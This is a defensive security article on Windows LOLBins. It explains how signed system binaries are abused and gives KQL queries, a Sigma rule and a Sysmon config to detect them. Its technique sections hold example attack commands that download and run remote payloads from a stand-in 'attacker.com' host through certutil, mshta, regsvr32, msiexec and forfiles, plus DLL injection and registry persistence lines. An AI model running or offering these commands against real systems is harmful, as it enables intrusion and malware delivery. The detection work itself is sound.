Your antivirus didn’t fire. Your EDR didn’t alert. The attacker never dropped a single malicious file — yet they’re running code on your systems right now, using tools that Microsoft shipped with Windows.

This is the LOLBins problem, and in 2026 it’s worse than ever.

TL;DR

  • 79% of cyberattack detections in 2024 involved no malware — attackers use Windows’ own binaries instead (CrowdStrike)
  • LOLBins (Living Off the Land Binaries) are legitimate, signed Microsoft tools repurposed to download payloads, execute code, and move laterally
  • Chinese APT Flax Typhoon and the Remcos/NetSupport RAT campaigns (Jan 2026) used zero custom malware — pure LOLBins from initial access to persistence
  • Most EDRs now catch the classic techniques (certutil download, regsvr32 Squiblydoo) — but chained LOLBins and newer binaries like curl.exe, tar.exe, and MAVInject.exe still slip through
  • Detection requires command-line logging (Sysmon or Event ID 4688) and behavioral correlation — signature-based tools are nearly useless here

Why “No Malware” Doesn’t Mean “No Attack”

Traditional security thinking goes like this: block malware → stop attacks. Antivirus scans files. EDRs look for suspicious executables. Firewalls block known-bad IPs.

Attackers adapted. Instead of dropping a custom backdoor that security tools recognize, they do everything with software that was already on the machine when it shipped from the factory.

Living Off the Land Binaries — LOLBins — are legitimate, Microsoft-signed Windows executables that have secondary capabilities: downloading files from the internet, executing scripts, injecting code into other processes, or bypassing application whitelisting. They’re not malware. They have real, legitimate uses. And that’s exactly the point.

When security software sees certutil.exe running, it sees a Microsoft-signed certificate utility. It doesn’t know — without behavioral context — whether it’s a system administrator managing certificates or an attacker downloading a payload.

The Scale of the Problem

The shift to LOLBins-based attacks isn’t a niche technique. It’s now the dominant attack pattern:

  • 79% of all attack detections in 2024 were malware-free (CrowdStrike 2025 Global Threat Report), up from just 40% in 2019
  • LOLBins appeared in 17% of all incident investigations in Q3 2025, up from 13% in H1 2025 — growing within a single year
  • PowerShell appears in 71% of all Living Off the Land attacks across telemetry data
  • The LOLBAS Project has catalogued over 100 Windows binaries with documented abuse potential — with new entries being added regularly

This isn’t a technique used only by sophisticated nation-state actors anymore. TA505, a financially-motivated criminal group, chains LOLBins into delivery pipelines for ransomware and banking trojans. The technique has been thoroughly commoditized.

The LOLBins Toolkit: What Gets Abused and How

certutil.exe — The Swiss Army Knife

certutil is a certificate management utility. It also happens to be able to download files from the internet and decode Base64 — making it one of the most frequently abused LOLBins in existence.

Terminal window
:: Download a payload directly to disk
certutil.exe -urlcache -split -f http://attacker.com/payload.exe C:\Windows\Temp\p.exe


:: Decode a Base64-encoded payload
certutil.exe -decode encoded.txt payload.exe


:: Both combined: download encoded, then decode
certutil.exe -urlcache -split -f http://attacker.com/stage2.b64 stage2.b64
certutil.exe -decode stage2.b64 stage2.exe

In 2025, certutil was observed in the delivery chain for the PipeMagic backdoor — the ransomware campaign that exploited CVE-2025-29824 (a Windows CLFS zero-day) against targets in the US, Spain, Venezuela, and Saudi Arabia.

Detection status: Well-known. Most EDRs alert on certutil -urlcache. Still widely used because many organizations haven’t blocked it.

mshta.exe — Running Scripts in Disguise

mshta (Microsoft HTML Application Host) executes .hta files — essentially HTML pages with embedded VBScript or JScript. Attackers use it to execute scripts hosted remotely, with no file ever touching disk.

Terminal window
:: Execute a script hosted on attacker infrastructure — nothing written to disk
mshta.exe http://attacker.com/payload.hta


:: Inline script execution — entire payload in the command line
mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""cmd /c whoami"",0,True")

In Q3 2025, a ransomware operator used mshta.exe with an inline script to modify registry persistence keys. The attack window was sized to resizeTo(0, 2) — two pixels — making any visible window completely invisible to the user sitting at the machine.

Detection status: Parent-child relationships (mshta spawning rundll32 or PowerShell) are well-signatured. Inline script execution is harder to catch without full command-line logging.

regsvr32.exe — The Squiblydoo

regsvr32 registers COM components. It can also load and execute a remote .sct (scriptlet) file — a technique called “Squiblydoo,” published in 2016 and still working in 2026.

Terminal window
:: Squiblydoo — load and execute a remote scriptlet
regsvr32.exe /s /n /u /i:http://attacker.com/payload.sct scrobj.dll


:: The /s suppresses dialogs, /u unregisters (triggers DllUnregisterServer — runs the code),
:: scrobj.dll is the built-in script component object handler

What makes Squiblydoo persistent: it bypasses AppLocker (application whitelisting) because regsvr32.exe is a trusted binary. AppLocker rules that say “only run signed executables” don’t stop it.

Detection status: Widely detected now. Any regsvr32 calling a URL is a high-confidence alert.

rundll32.exe — DLL Proxy Execution

rundll32 executes functions exported from DLL files. Attackers use it to run malicious DLLs that don’t have their own entry point, call built-in Windows DLL functions for side effects, or proxy execution through a trusted binary.

Terminal window
:: Execute a function from a malicious DLL
rundll32.exe C:\Windows\Temp\evil.dll,EntryPoint


:: Use a built-in DLL to run JavaScript (older Windows)
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe')")

Detection status: rundll32 calling network paths or spawning child processes is well-detected. Pure DLL side-loading via rundll32 with a local file is harder.

msiexec.exe — Remote Installer

msiexec installs MSI packages. Point it at a remote URL and it downloads and installs whatever is at that location — which can be anything packaged as an MSI.

Terminal window
:: Download and execute a remote MSI — full silent install
msiexec.exe /i http://attacker.com/payload.msi /quiet /norestart


:: Also used to load DLLs
msiexec.exe /y C:\Windows\Temp\evil.dll

TA505 used msiexec to deliver the ServHelper backdoor against financial sector targets. The MSI appeared as a legitimate software installer.

Detection status: msiexec /i http:// is a high-confidence indicator. Direct DLL loading is less commonly detected.

forfiles.exe — Spawning Binaries in Disguise

forfiles runs a command for each file matching a pattern. Attackers use it as a proxy to spawn other binaries, bypassing some parent-process monitoring rules.

Terminal window
:: Use forfiles to spawn mshta — evades rules looking for direct mshta execution
forfiles /p C:\Windows\System32 /m notepad.exe /c "mshta http://attacker.com/payload.hta"

This exact technique appeared in the Remcos and NetSupport RAT campaign documented by Malwarebytes in January 2026 — one of the most complete LOLBin chains observed to date (see full chain below).

Detection status: forfiles spawning mshta.exe or PowerShell is detectable but requires parent-child correlation rules.

A Complete LOLBin Attack Chain: The 2026 RAT Campaign

The January 2026 Remcos/NetSupport RAT campaign documented by Malwarebytes is a masterclass in LOLBin chaining. The entire kill chain from phishing email to persistent RAT used zero custom malware until the very final payload. Every step used a built-in or legitimately-signed binary:

1. Phishing email → Office document opens
2. forfiles.exe → spawns mshta.exe (HTA from remote URL)
3. mshta.exe → triggers PowerShell
4. PowerShell → calls curl.exe (built-in Windows 10+)
5. curl.exe → downloads TAR archive + PDF decoy
6. tar.exe (built-in Windows 10+) → extracts contents
7. Trojanized glaxnimate.exe → runs WScript.exe + batch scripts
8. reg.exe → adds persistence:
   reg add "HKCU\Environment" /v UserInitMprLogonScript /d "malware.bat"
9. → Remcos RAT or NetSupport Manager installed

No step in this chain involves a file that any traditional AV would flag as malicious. Each binary is either signed by Microsoft or a legitimate open-source application. Only glaxnimate.exe (a trojanized animation tool) was modified — and it looks clean on VirusTotal until the actual infection begins.

curl.exe and tar.exe deserve special attention here. Both have been natively included in Windows 10 since 2018 and 2019 respectively. Attackers realized they’re signed by Microsoft, most baselines treat them as benign, and EDR behavioral rules for them are far less mature than for certutil or bitsadmin. Expect their abuse to grow.

MAVInject.exe: The Nation-State LOLBin

In February 2025, Trend Micro and Mandiant documented Mustang Panda (the Chinese APT also known as Earth Preta) using MAVInject.exe — the Microsoft Application Virtualization Injector — to inject DLLs into running processes.

Terminal window
:: Inject malicious DLL into waitfor.exe (legitimate Windows binary)
MavInject.exe <TARGET_PID> /INJECTRUNNING C:\Windows\Temp\evil.dll

The technique was specifically deployed when the victim machine had ESET antivirus running. By injecting into waitfor.exe (a legitimate process), Mustang Panda’s TONESHELL backdoor ran inside a trusted process — bypassing ESET’s detection.

MAVInject.exe is obscure enough that most security teams have never heard of it, detection coverage is thin, and it’s legitimately signed by Microsoft.

What EDRs Catch vs. What Still Works

TechniqueDetection StatusNotes
certutil -urlcache download✅ Well-detectedSignatured across all major EDRs
regsvr32 loading remote SCT✅ Well-detectedHigh-confidence rule in most SIEMs
mshta spawning rundll32 / PowerShell✅ Usually detectedParent-child rules are mature
bitsadmin /transfer download✅ Well-detectedWidely signatured since ~2020
forfiles spawning mshta⚠️ PartialRequires parent-child correlation
curl.exe / tar.exe in attack chains⚠️ PartialToo new for mature baselines
MAVInject.exe process injection❌ Low coverageNiche binary, rarely tuned
Chained LOLBins (4+ binaries)❌ Hard to catchEach step looks benign individually
ETW patching before LOLBin use❌ Blind spotSuppresses EDR telemetry before execution
Parent process spoofing (PPID)❌ Hard to catchForged parent PID breaks parent-child rules

The critical insight: EDRs are good at detecting individual LOLBin abuse in isolation. They struggle when an attacker chains 5-8 binaries together, where each individual step looks completely normal. The only way to catch chained LOLBins is behavioral sequence analysis — correlating events across a timeline, not just reacting to individual process executions.

Blue Team: Detection

Step 1: Enable Command-Line Logging

Nothing else matters if you can’t see what commands are running. Command-line logging is disabled by default in Windows.

Terminal window
# Enable via GPO:
# Computer Configuration → Windows Settings → Security Settings
# → Advanced Audit Policy Configuration → Detailed Tracking
# → Audit Process Creation → Success
# + Enable: Include command line in process creation events


# Or directly via registry:
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit' `
  -Name ProcessCreationIncludeCmdLine_Enabled -Value 1

Better: deploy Sysmon (System Monitor from Sysinternals). Sysmon Event ID 1 gives you process creation with full command line, parent process, hashes, and more — far richer than the built-in Event ID 4688.

KQL Detection: certutil Downloading Files

// Sysmon Event ID 1 — certutil used as downloader
SecurityEvent
| where EventID == 1
| where Process endswith "certutil.exe"
| where CommandLine has_any ("-urlcache", "-split", "-decode", "-decodehex")
| project TimeGenerated, Computer, Account,
          CommandLine, ParentProcessName
| sort by TimeGenerated desc

KQL Detection: mshta Spawning Suspicious Children

// mshta.exe spawning processes that indicate scripting/execution
SecurityEvent
| where EventID == 1
| where ParentProcessName endswith "mshta.exe"
| where Process has_any ("powershell.exe", "rundll32.exe",
                          "regsvr32.exe", "cmd.exe", "wscript.exe")
| project TimeGenerated, Computer, Account,
          Process, CommandLine, ParentProcessName
| sort by TimeGenerated desc

KQL Detection: The forfiles LOLBin Chain

// forfiles spawning mshta — the 2026 RAT delivery pattern
SecurityEvent
| where EventID == 1
| where ParentProcessName endswith "forfiles.exe"
| where Process has_any ("mshta.exe", "powershell.exe",
                          "wscript.exe", "cscript.exe")
| project TimeGenerated, Computer, Account,
          Process, CommandLine
| sort by TimeGenerated desc

KQL Detection: LOLBins Making Network Connections

// Sysmon Event ID 3 — network connections from LOLBins
// (requires Sysmon with network monitoring enabled)
let lolbins = dynamic(["certutil.exe", "mshta.exe", "regsvr32.exe",
                        "rundll32.exe", "msiexec.exe", "bitsadmin.exe",
                        "curl.exe", "wscript.exe", "cscript.exe"]);
SecurityEvent
| where EventID == 3
| where Process has_any (lolbins)
| where DestinationPort in (80, 443, 8080, 8443)
| where DestinationIsIpv4 == true
// Optionally filter known-good (e.g., Windows Update IPs)
| project TimeGenerated, Computer, Account,
          Process, CommandLine, DestinationIp, DestinationPort
| sort by TimeGenerated desc

KQL Detection: MAVInject.exe Execution

// MAVInject.exe running at all is suspicious outside App-V environments
SecurityEvent
| where EventID == 1
| where Process endswith "MAVInject.exe"
| project TimeGenerated, Computer, Account,
          CommandLine, ParentProcessName

Sigma Rule: regsvr32 Remote SCT Load (Squiblydoo)

title: Regsvr32 Loading Remote Scriptlet (Squiblydoo)
id: c7da4c35-4b9e-4f8c-a20d-8f3b9d6e2a11
status: stable
description: Detects regsvr32 loading a remote SCT file — classic Squiblydoo technique
references:
  - https://attack.mitre.org/techniques/T1218/010/
  - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\regsvr32.exe'
    CommandLine|contains:
      - 'http://'
      - 'https://'
      - 'scrobj.dll'
  condition: selection
falsepositives:
  - Legitimate COM component registration from internal servers (rare)
level: high
tags:
  - attack.defense_evasion
  - attack.t1218.010

MITRE ATT&CK Mapping

TechniqueIDBinaries
System Binary Proxy Execution: MshtaT1218.005mshta.exe
System Binary Proxy Execution: MsiexecT1218.007msiexec.exe
System Binary Proxy Execution: Regsvr32T1218.010regsvr32.exe
System Binary Proxy Execution: Rundll32T1218.011rundll32.exe
BITS JobsT1197bitsadmin.exe
Ingress Tool TransferT1105certutil, curl, bitsadmin
Deobfuscate/Decode FilesT1140certutil -decode
Process InjectionT1055MAVInject.exe
Scheduled Task / Logon ScriptT1037.001reg.exe (persistence)

What You Can Do Today

1. Block the Worst Offenders Where Possible

If your organization doesn’t use these binaries for legitimate purposes, block them:

Terminal window
# AppLocker policy — block mshta.exe for standard users
# Group Policy: Computer Config → Windows Settings → Security Settings
# → Application Control Policies → AppLocker → Executable Rules


# Or via Windows Defender Application Control (WDAC) policy
# Block specific binaries in deny rules:
# mshta.exe, regsvr32.exe loading remote files, bitsadmin /transfer

Caution: certutil, rundll32, and msiexec are used by legitimate software (including Windows Update mechanisms). Outright blocking them breaks things. Focus on behavioral rules, not binary-level blocks.

2. Restrict Network Access from LOLBins

A certutil download needs outbound HTTP/HTTPS. Most LOLBin attacks require the binary to reach the internet. Network-layer controls help even when endpoint detection misses:

Firewall/proxy rules:
- Block outbound HTTP/HTTPS from certutil.exe, mshta.exe, regsvr32.exe
- Alert on any connection from bitsadmin.exe, msiexec.exe to non-Microsoft IPs
- Proxy all outbound connections through inspection — no direct internet from endpoints

3. Enable Sysmon Across All Endpoints

The built-in Windows Event Log is insufficient for LOLBin detection. Sysmon provides the telemetry you need:

<!-- Minimal Sysmon config — process creation + network -->
<Sysmon schemaversion="4.90">
  <EventFiltering>
    <!-- Log all process creation -->
    <RuleGroup name="ProcessCreate" groupRelation="or">
      <ProcessCreate onmatch="exclude"/>
    </RuleGroup>
    <!-- Log network connections from LOLBins -->
    <RuleGroup name="NetworkConnect" groupRelation="or">
      <NetworkConnect onmatch="include">
        <Image condition="end with">certutil.exe</Image>
        <Image condition="end with">mshta.exe</Image>
        <Image condition="end with">regsvr32.exe</Image>
        <Image condition="end with">rundll32.exe</Image>
        <Image condition="end with">msiexec.exe</Image>
      </NetworkConnect>
    </RuleGroup>
  </EventFiltering>
</Sysmon>

Use SwiftOnSecurity’s Sysmon config as a comprehensive starting baseline.

4. Hunt for LOLBins Proactively

Don’t wait for alerts — run these queries weekly as a baseline hunt:

Terminal window
# PowerShell — find certutil executions in Windows Event Log (last 7 days)
Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4688
    StartTime = (Get-Date).AddDays(-7)
} | Where-Object { $_.Message -match 'certutil' -and $_.Message -match 'urlcache' }

5. Audit Your Exposure

Check which LOLBins have actually run in your environment over the past 30 days. Any binary you’ve never seen run is worth investigating if it suddenly appears. Establish a baseline of what’s normal — then alert on deviations.

Conclusion

The shift to LOLBin-based attacks represents a fundamental challenge for traditional security models. When attackers use certutil.exe to download a payload, they’re abusing a binary that Microsoft ships with every version of Windows. You can’t delete it, you can’t flag it as malware, and your antivirus has no signature for “Microsoft’s own tool being misused.”

The answer is behavioral detection. Not “what binary ran” but “what did it do, what spawned it, what did it connect to, and does this sequence make sense?” That requires:

  1. Full command-line logging (Sysmon)
  2. Behavioral correlation rules in your SIEM
  3. Network-layer visibility to catch outbound connections
  4. Proactive threat hunting — not just reactive alerting

The good news: the most common LOLBin techniques are well-documented. The LOLBAS project catalogues every known binary with abuse examples. MITRE ATT&CK T1218 maps the detection logic. The knowledge exists. The gap is instrumentation and tuning — and that’s fixable.

Analyzing suspicious command-line activity from Windows Event Logs? Paste raw Event ID 4688 or Sysmon Event ID 1 output into our SOC Log Analyzer for automated threat scoring and pattern detection.

Sources